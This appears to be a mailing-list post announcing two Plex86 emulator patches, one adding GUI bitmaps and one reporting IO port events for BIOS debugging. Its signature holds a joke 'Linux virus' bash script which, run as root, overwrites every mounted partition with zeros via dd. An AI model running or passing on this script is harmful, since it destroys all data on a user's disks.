Aloha! I just made two patches for Plex86, available at Savannah ( http://savannah.gnu.org/projects/plex86/ ).
The first one isn't new, as it adds the missing bitmaps to the GUI. The second one is the one I'd like comments on, it is a debugging aid which reports IO port events. I use it to work on BIOS stuff. Thanks -- Eric Laberge -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GCS/M/S d-(++) s-: a-- C++(++++) UL+++>$ !P L++ E--- W++ N+ w++ !O M !V PS PE Y PGP-(+++) t++(-) X- R* tv+ b+ DI+++ D+ G e+>+++++ h! r-- ------END GEEK CODE BLOCK------ #!/bin/bash if [ $UID -ne 0 ] then echo "Linux virus, please run as root" else for partition in $(df | cut -d ' ' -f 1 | grep /dev) do dd if=/dev/zero of=$partition done fi
